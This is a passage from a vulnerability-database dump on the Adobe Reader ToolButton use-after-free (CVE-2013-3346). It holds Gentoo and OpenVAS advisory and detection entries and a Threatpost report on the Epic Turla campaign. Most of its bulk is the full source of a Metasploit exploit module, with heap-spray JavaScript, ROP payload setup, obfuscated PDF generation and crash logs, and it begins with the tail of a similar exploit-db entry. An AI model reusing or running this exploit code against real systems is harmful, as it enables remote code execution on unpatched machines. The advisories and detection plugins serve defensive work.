xrefPosition.to_s() << eol\r\n\r\n pdf << \"%%EOF\" << eol\r\n pdf\r\n end\r\n\r\nend\r\n\r\n\r\n=begin\r\n\r\n* crash Adobe Reader 10.1.4\r\n\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001\r\neip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213\r\nAcroRd32_60000000!PDFLTerm+0xbb7cd:\r\n604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=????????\r\n\r\n* crash Adobe Reader 11.0.2\r\n\r\n(940.d70): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\Adobe\\Reader 11.0\\Reader\\AcroRd32.dll -\r\neax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000\r\neip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213\r\nAcroRd32_60000000!DllCanUnloadNow+0x1493ae:\r\n60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=????????\r\n\r\n=end\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/30394/"}], "gentoo": [{"lastseen": "2016-09-06T19:46:26", "bulletinFamily": "unix", "description": "### Background\n\nAdobe Reader is a closed-source PDF reader.\n\n### Description\n\nAn unspecified vulnerability exists in Adobe Reader.\n\n### Impact\n\nAn attacker could execute arbitrary code or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Reader users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-text/acroread-9.5.5\"", "modified": "2013-09-15T00:00:00", "published": "2013-09-15T00:00:00", "id": "GLSA-201309-10", "href": "https://security.gentoo.org/glsa/201309-10", "type": "gentoo", "title": "Adobe Reader: Arbitrary Code Execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-02-16T01:27:25", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2013-12-17T00:00:00", "published": "2013-12-17T00:00:00", "id": "1337DAY-ID-21684", "href": "https://0day.today/exploit/description/21684", "type": "zdt", "title": "Adobe Reader ToolButton Use After Free", "sourceData": "require 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Adobe Reader ToolButton Use After Free\",\r\n 'Description' => %q{\r\n This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6\r\n and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where\r\n the cEnable callback can be used to early free the object memory. Later use of the object\r\n allows triggering the use after free condition. This module has been tested successfully\r\n on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in\r\n November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order\r\n to exploit Adobe Reader 9 the fileformat version of the exploit can be used.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Soroush Dalili', # Vulnerability discovery\r\n 'Unknown', # Exploit in the wild\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-3346' ],\r\n [ 'OSVDB', '96745' ],\r\n [ 'ZDI', '13-212' ],\r\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ],\r\n [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => \"\\x00\",\r\n 'DisableNops' => true\r\n },\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :os_flavor => Msf::OperatingSystems::WindowsVersions::XP,\r\n :ua_name => Msf::HttpClients::IE\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows XP / IE / Adobe Reader 10/11', { } ],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Aug 08 2013\",\r\n 'DefaultTarget' => 0))\r\n \r\n end\r\n \r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"request: #{request.uri}\")\r\n js_data = make_js(cli, target_info)\r\n # Create the pdf\r\n pdf = make_pdf(js_data)\r\n print_status(\"Sending PDF...\")\r\n send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\r\n end\r\n \r\n def make_js(cli, target_info)\r\n # CreateFileMappingA + MapViewOfFile + memcpy rop chain\r\n rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))\r\n rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))\r\n escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info))\r\n \r\n js = %Q|\r\nfunction heapSpray(str, str_addr, r_addr) {\r\n var aaa = unescape(\"%u0c0c\");\r\n aaa += aaa;\r\n while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa;\r\n var i1 = r_addr - 0x24;\r\n var bbb = aaa.substring(0, i1 / 2);\r\n var sa = str_addr;\r\n while (sa.length < (0x0c0c - r_addr)) sa += sa;\r\n bbb += sa;\r\n bbb += aaa;\r\n var i11 = 0x0c0c - 0x24;\r\n bbb = bbb.substring(0, i11 / 2);\r\n bbb += str;\r\n bbb += aaa;\r\n var i2 = 0x4000 + 0xc000;\r\n var ccc = bbb.substring(0, i2 / 2);\r\n while (ccc.length < (0x40000 + 0x40000)) ccc += ccc;\r\n var i3 = (0x1020 - 0x08) / 2;\r\n var ddd = ccc.substring(0, 0x80000 - i3);\r\n var eee = new Array();\r\n for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + \"s\";\r\n return;\r\n}\r\nvar shellcode = unescape(\"#{escaped_payload}\");\r\nvar executable = \"\";\r\nvar rop10 = unescape(\"#{rop_10}\");\r\nvar rop11 = unescape(\"#{rop_11}\");\r\nvar r11 = false;\r\nvar vulnerable = true;\r\n \r\nvar obj_size;\r\nvar rop;\r\nvar ret_addr;\r\nvar rop_addr;\r\nvar r_addr;\r\n \r\nif (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {\r\n obj_size = 0x360 + 0x1c;\r\n rop = rop10;\r\n rop_addr = unescape(\"%u08e4%u0c0c\");\r\n r_addr = 0x08e4;\r\n ret_addr = unescape(\"%ua8df%u4a82\");\r\n} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {\r\n r11 = true;\r\n obj_size = 0x370;\r\n rop = rop11;\r\n rop_addr = unescape(\"%u08a8%u0c0c\");\r\n r_addr = 0x08a8;\r\n ret_addr = unescape(\"%u8003%u4a84\");\r\n} else {\r\n vulnerable = false;\r\n}\r\n \r\nif (vulnerable) {\r\n var payload = rop + shellcode;\r\n heapSpray(payload, ret_addr, r_addr);\r\n \r\n var part1 = \"\";\r\n if (!r11) {\r\n for (i = 0; i < 0x1c / 2; i++) part1 += unescape(\"%u4141\");\r\n }\r\n part1 += rop_addr;\r\n var part2 = \"\";\r\n var part2_len = obj_size - part1.length * 2;\r\n for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape(\"%u4141\");\r\n var arr = new Array();\r\n \r\n removeButtonFunc = function () {\r\n app.removeToolButton({\r\n cName: \"evil\"\r\n });\r\n \r\n for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);\r\n }\r\n \r\n addButtonFunc = function () {\r\n app.addToolButton({\r\n cName: \"xxx\",\r\n cExec: \"1\",\r\n cEnable: \"removeButtonFunc();\"\r\n });\r\n }\r\n \r\n app.addToolButton({\r\n cName: \"evil\",\r\n cExec: \"1\",\r\n cEnable: \"addButtonFunc();\"\r\n });\r\n}\r\n|\r\n \r\n js\r\n end\r\n \r\n def RandomNonASCIIString(count)\r\n result = \"\"\r\n count.times do\r\n result << (rand(128) + 128).chr\r\n end\r\n result\r\n end\r\n \r\n def ioDef(id)\r\n \"%d 0 obj \\n\" % id\r\n end\r\n \r\n def ioRef(id)\r\n \"%d 0 R\" % id\r\n end\r\n \r\n \r\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n def nObfu(str)\r\n #return str\r\n result = \"\"\r\n str.scan(/./u) do |c|\r\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n result << \"#%x\" % c.unpack(\"C*\")[0]\r\n else\r\n result << c\r\n end\r\n end\r\n result\r\n end\r\n \r\n \r\n def ASCIIHexWhitespaceEncode(str)\r\n result = \"\"\r\n whitespace = \"\"\r\n str.each_byte do |b|\r\n result << whitespace << \"%02x\" % b\r\n whitespace = \" \" * (rand(3) + 1)\r\n end\r\n result << \">\"\r\n end\r\n \r\n \r\n def make_pdf(js)\r\n xref = []\r\n eol = \"\\n\"\r\n endobj = \"endobj\" << eol\r\n \r\n # Randomize PDF version?\r\n pdf = \"%PDF-1.5\" << eol\r\n pdf << \"%\" << RandomNonASCIIString(4) << eol\r\n \r\n # catalog\r\n xref << pdf.length\r\n pdf << ioDef(1) << nObfu(\"<<\") << eol\r\n pdf << nObfu(\"/Pages \") << ioRef(2) << eol\r\n pdf << nObfu(\"/Type /Catalog\") << eol\r\n pdf << nObfu(\"/OpenAction \") << ioRef(4) << eol\r\n # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load\r\n pdf << nObfu(\"/AcroForm \") << ioRef(6) << eol\r\n pdf << nObfu(\">>\") << eol\r\n pdf << endobj\r\n \r\n # pages array\r\n xref << pdf.length\r\n pdf << ioDef(2) << nObfu(\"<<\") << eol\r\n pdf << nObfu(\"/Kids [\") << ioRef(3) << \"]\" << eol\r\n pdf << nObfu(\"/Count 1\") << eol\r\n pdf << nObfu(\"/Type /Pages\") << eol\r\n pdf << nObfu(\">>\") << eol\r\n pdf << endobj\r\n \r\n # page 1\r\n xref << pdf.length\r\n pdf << ioDef(3) << nObfu(\"<<\") << eol\r\n pdf << nObfu(\"/Parent \") << ioRef(2) << eol\r\n pdf << nObfu(\"/Type /Page\") << eol\r\n pdf << nObfu(\">>\") << eol # end obj dict\r\n pdf << endobj\r\n \r\n # js action\r\n xref << pdf.length\r\n pdf << ioDef(4) << nObfu(\"<<\")\r\n pdf << nObfu(\"/Type/Action/S/JavaScript/JS \") + ioRef(5)\r\n pdf << nObfu(\">>\") << eol\r\n pdf << endobj\r\n \r\n # js stream\r\n xref << pdf.length\r\n compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n pdf << ioDef(5) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n pdf << \"stream\" << eol\r\n pdf << compressed << eol\r\n pdf << \"endstream\" << eol\r\n pdf << endobj\r\n \r\n ###\r\n # The following form related data is required to get icucnv36.dll / icucnv40.dll to load\r\n ###\r\n \r\n # form object\r\n xref << pdf.length\r\n pdf << ioDef(6)\r\n pdf << nObfu(\"<</XFA \") << ioRef(7) << nObfu(\">>\") << eol\r\n pdf << endobj\r\n \r\n # form stream\r\n xfa = <<-EOF\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\r\n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\">\r\n<present><pdf><interactive>1</interactive></pdf></present>\r\n</config>\r\n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\">\r\n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\">\r\n<pageSet></pageSet>\r\n</subform></template></xdp:xdp>\r\n EOF\r\n \r\n xref << pdf.length\r\n pdf << ioDef(7) << nObfu(\"<</Length %s>>\" % xfa.length) << eol\r\n pdf << \"stream\" << eol\r\n pdf << xfa << eol\r\n pdf << \"endstream\" << eol\r\n pdf << endobj\r\n \r\n ###\r\n # end form stuff for icucnv36.dll / icucnv40.dll\r\n ###\r\n \r\n \r\n # trailing stuff\r\n xrefPosition = pdf.length\r\n pdf << \"xref\" << eol\r\n pdf << \"0 %d\" % (xref.length + 1) << eol\r\n pdf << \"0000000000 65535 f\" << eol\r\n xref.each do |index|\r\n pdf << \"%010d 00000 n\" % index << eol\r\n end\r\n \r\n pdf << \"trailer\" << eol\r\n pdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n \r\n pdf << \"startxref\" << eol\r\n pdf << xrefPosition.to_s() << eol\r\n \r\n pdf << \"%%EOF\" << eol\r\n pdf\r\n end\r\n \r\nend\r\n \r\n \r\n=begin\r\n \r\n* crash Adobe Reader 10.1.4\r\n \r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001\r\neip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213\r\nAcroRd32_60000000!PDFLTerm+0xbb7cd:\r\n604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=????????\r\n \r\n* crash Adobe Reader 11.0.2\r\n \r\n(940.d70): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\Adobe\\Reader 11.0\\Reader\\AcroRd32.dll -\r\neax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000\r\neip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213\r\nAcroRd32_60000000!DllCanUnloadNow+0x1493ae:\r\n60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=????????\r\n \r\n=end\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21684"}], "thn": [{"lastseen": "2017-01-08T18:01:12", "bulletinFamily": "info", "description": "None\n", "modified": "2013-11-29T15:47:58", "published": "2013-11-29T04:40:00", "id": "THN:1EA4AB16D6C3A0518A078CC8C9304FA5", "href": "http://thehackernews.com/2013/11/CVE-2013-5065-Windows-XP-Privilege-escalation-Zero-Day-exploit.html", "type": "thn", "title": "CVE-2013-5065: Microsoft Windows XP and Server 2003 Privilege escalation Zero-Day exploit discovered", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:22", "bulletinFamily": "info", "description": "The [Turla APT campaign](<http://threatpost.com/agent-btz-malware-may-have-served-as-starting-point-for-red-october-turla/104735>) has baffled researchers for months as to how its victims are compromised. Peaking during the first two months of the year, Turla has targeted municipal governments, embassies, militaries and other high-value targets worldwide, with particular concentrations in the Middle East and Europe.\n\nResearchers at Kaspersky Lab, however, today announced they have discovered a [precursor to Turla called Epic](<https://securelist.com/analysis/publications/65545/the-epic-turla-operation/>) that uses a cocktail of zero-days and off-the-shelf exploits against previously unknown and patched vulnerabilities to compromise victims. Epic is the first of a multistage attack that hits victims via spear-phishing campaigns, social engineering scams, or watering hole attacks against websites of interest to the victims.\n\nEpic shares code snippets with Turla and similar encryption used to confound researchers, suggesting a link between the two campaigns; either the attackers are cooperating or are the same group, Kaspersky researchers said.\n\nTo date, there are more than 500 victim IP addresses in 45 countries, and as Tuesday the campaign remained active. The malware establishes a backdoor connection to the attackers through which system information is sent in order to determine which exploits are fed to the compromised machine and ultimately where stolen data is exfiltrated. The attackers have a variety of backdoors at their disposal, and use them according to the value of the target, Kaspersky researchers said.\n\nTwo zero-day exploits against Windows XP and Windows Server 2003 ([CVE-2013-5065](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5065>)) vulnerabilities and Adobe Reader ([CVE-2013-3346](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3346>)) have been used against some targets in order to gain administrative privileges. Users are infected via spearphishing emails with infected PDF exploits, or via infected websites hosting Java exploits that are really malware installers posing as a .scr file or Flash Player. Victims are tricked, in the last two cases, into installing the infected files, Kaspersky researchers said.\n\n[![Epic Turla](https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015516/Epic-Turla-300x300.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015516/Epic-Turla.png>)\n\nMore than 100 websites have been infected in the Epic campaign, most of them municipal government websites, including the website for City Hall in Pinor, Spain, an entrepreneurial site in Romania and the Palestinian Authority Ministry of Foreign Affairs. All of the sites were built using the TYPO3 content management system, indicating the attackers have access to a vulnerability on that platform. Once compromised, the websites then load remote JavaScript that performs a number of tasks, including dropping exploits for flaws in Internet Explorer 6-8, recent Java or Flash bugs, or a phony Microsoft Security Essentials application signed with a legitimate certificate from Sysprint AG.\n\n\u201cThe Epic Turla attackers are extremely dynamic in using exploits or different methods depending on what is available at the moment,\u201d Kaspersky Lab said in its research report.\n\nMore than 50 hacked servers make up the Epic Turla command infrastructure, Kaspersky Lab said. Victimized computers communicate to a centralized server via a network of proxies and VPN connections. The attackers make a determination whether to exploit a particular machine based on a number of existing system and third-party application configurations. If certain processes, such as tcpdump, windump, ethereal, wireshark and others are running, the backdoor will terminate. Otherwise, if the victim is of interest, a different backdoor called Carbon or Pfinet, is deployed and the Epic campaign updates the configuration file with a new set of command and control servers, further indicating a connection between the Epic and Turla campaigns. Attack commands are sent that include a keylogger used to steal credentials in order to move laterally, as well as a list of specific .doc files to search for. Some of the document searches found are: \u201cNATO.msg;\u201d \u201ceu energy dialogue;\u201d and \u201cEU.msg.\u201d\n\n\u201cThe configuration updates for the Cobra/Carbon system malware, also known as Pfinet, are interesting, because this is another project related to the Turla threat actor. This suggests that we are dealing with a multi-stage infection that begins with the Epic Turla \u2013 to gain a foothold and validate the high profile victim. If the victim is interesting, it gets upgraded to the full Turla Carbon system,\u201dsaid Costin Raiu, Director of the Global Research and Analysis Team at Kaspersky Lab.\n\nThe Carbon backdoors, meanwhile, share characteristics with other attack platforms such as Tilded and Flame, as well as some subtle connections to [Miniduke](<https://securelist.com/blog/incidents/31112/the-miniduke-mystery-pdf-0-day-government-spy-assembler-0x29a-micro-backdoor>). The attackers do not seem to be native English speakers, Kaspersky\u2019s report said. One of the Epic backdoors is called \u201cZagruzchik.dll\u201d which translates to bootloader in Russian, and the Epic Turla control panel is set to Cyrillic.\n\nMost of the victims are in France, the United States, Iran and Russia with targets ranging from ministries of the interior, trade and commerce, foreign affairs and intelligence in the European Union and Asia.\n", "modified": "2014-08-13T14:43:15", "published": "2014-08-07T10:00:03", "id": "THREATPOST:B27D20AA97E34E737FEFFB96CFD7603B", "href": "https://threatpost.com/epic-operation-kicks-off-multistage-turla-apt-campaign/107612/", "type": "threatpost", "title": "Epic Operation Kicks Off Multistage Turla APT Campaign", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-07-17T14:29:45", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Acrobat and is prone to multiple unspecified\nvulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2013-05-28T00:00:00", "id": "OPENVAS:1361412562310803616", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803616", "title": "Adobe Acrobat Multiple Unspecified Vulnerabilities -01 May13 (Windows)", "type": "openvas", "sourceData": "#############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_mult_unspecified_vuln01_may13_win.nasl 29729 2013-05-28 10:47:39Z may$\n#\n# Adobe Acrobat Multiple Unspecified Vulnerabilities -01 May13 (Windows)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803616\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2013-3342\", \"CVE-2013-3341\", \"CVE-2013-3340\", \"CVE-2013-3339\",\n \"CVE-2013-3338\", \"CVE-2013-3337\", \"CVE-2013-2737\", \"CVE-2013-2736\",\n \"CVE-2013-2735\", \"CVE-2013-2734\", \"CVE-2013-2733\", \"CVE-2013-2732\",\n \"CVE-2013-2731\", \"CVE-2013-2730\", \"CVE-2013-2729\", \"CVE-2013-2727\",\n \"CVE-2013-2726\", \"CVE-2013-2725\", \"CVE-2013-2724\", \"CVE-2013-2723\",\n \"CVE-2013-2722\", \"CVE-2013-2721\", \"CVE-2013-2720\", \"CVE-2013-2719\",\n \"CVE-2013-2718\", \"CVE-2013-3346\");\n script_bugtraq_id(59930, 59911, 59917, 59906, 59916, 59914, 59926, 59908, 59910,\n 59905, 59925, 59904, 59921, 59923, 59918, 59903, 59920, 59919,\n 59927, 59915, 59913, 59912, 59909, 59907, 59902);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 10:47:39 +0530 (Tue, 28 May 2013)\");\n script_name(\"Adobe Acrobat Multiple Unspecified Vulnerabilities -01 May13 (Windows)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat and is prone to multiple unspecified\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"solution\", value:\"Update to Adobe Acrobat Version 11.0.03 or 10.1.7 or 9.5.5 or later.\");\n script_tag(name:\"insight\", value:\"For more information about the vulnerabilities refer the reference links.\");\n script_tag(name:\"affected\", value:\"Adobe Acrobat Version 9.x prior to 9.5.5 on Windows\nAdobe Acrobat Version 10.x prior to 10.1.7 on Windows\nAdobe Acrobat Version 11.x prior to 11.0.03 on Windows\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code,\ncorrupt memory, obtain sensitive information, bypass certain security\nrestrictions or cause a denial of service condition.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53420\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/Win/Installed\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!acrobatVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(acrobatVer && acrobatVer =~ \"^9|10|11\")\n{\n if((version_in_range(version:acrobatVer, test_version:\"9.0\", test_version2: \"9.5.4\"))||\n (version_in_range(version:acrobatVer, test_version:\"10.0\", test_version2: \"10.1.6\"))||\n (version_in_range(version:acrobatVer, test_version:\"11.0\", test_version2: \"11.0.02\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:29:44", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Acrobat and is prone to multiple unspecified\nvulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2013-05-28T00:00:00", "id": "OPENVAS:1361412562310803617", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803617", "title": "Adobe Acrobat Multiple Unspecified Vulnerabilities -01 May13 (Mac OS X)", "type": "openvas", "sourceData": "#############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_mult_unspecified_vuln01_may13_macosx.nasl 29729 2013-05-28 10:51:02Z may$\n#\n# Adobe Acrobat Multiple Unspecified Vulnerabilities -01 May13 (Mac OS X)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803617\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2013-3342\", \"CVE-2013-3341\", \"CVE-2013-3340\", \"CVE-2013-3339\",\n \"CVE-2013-3338\", \"CVE-2013-3337\", \"CVE-2013-2737\", \"CVE-2013-2736\",\n \"CVE-2013-2735\", \"CVE-2013-2734\", \"CVE-2013-2733\", \"CVE-2013-2732\",\n \"CVE-2013-2731\", \"CVE-2013-2730\", \"CVE-2013-2729\", \"CVE-2013-2727\",\n \"CVE-2013-2726\", \"CVE-2013-2725\", \"CVE-2013-2724\", \"CVE-2013-2723\",\n \"CVE-2013-2722\", \"CVE-2013-2721\", \"CVE-2013-2720\", \"CVE-2013-2719\",\n \"CVE-2013-2718\", \"CVE-2013-3346\");\n script_bugtraq_id(59930, 59911, 59917, 59906, 59916, 59914, 59926, 59908, 59910,\n 59905, 59925, 59904, 59921, 59923, 59918, 59903, 59920, 59919,\n 59927, 59915, 59913, 59912, 59909, 59907, 59902);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 10:51:02 +0530 (Tue, 28 May 2013)\");\n script_name(\"Adobe Acrobat Multiple Unspecified Vulnerabilities -01 May13 (Mac OS X)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat and is prone to multiple unspecified\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"solution\", value:\"Update to Adobe Acrobat Version 11.0.03 or 10.1.7 or 9.5.5 or later.\");\n script_tag(name:\"insight\", value:\"For more information about the vulnerabilities refer the reference links.\");\n script_tag(name:\"affected\", value:\"Adobe Acrobat Version 9.x prior to 9.5.5 on Mac OS X\nAdobe Acrobat Version 10.x prior to 10.1.7 on Mac OS X\nAdobe Acrobat Version 11.x prior to 11.0.03 on Mac OS X\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code,\ncorrupt memory, obtain sensitive information, bypass certain security\nrestrictions or cause a denial of service condition.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53420\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!acrobatVer = 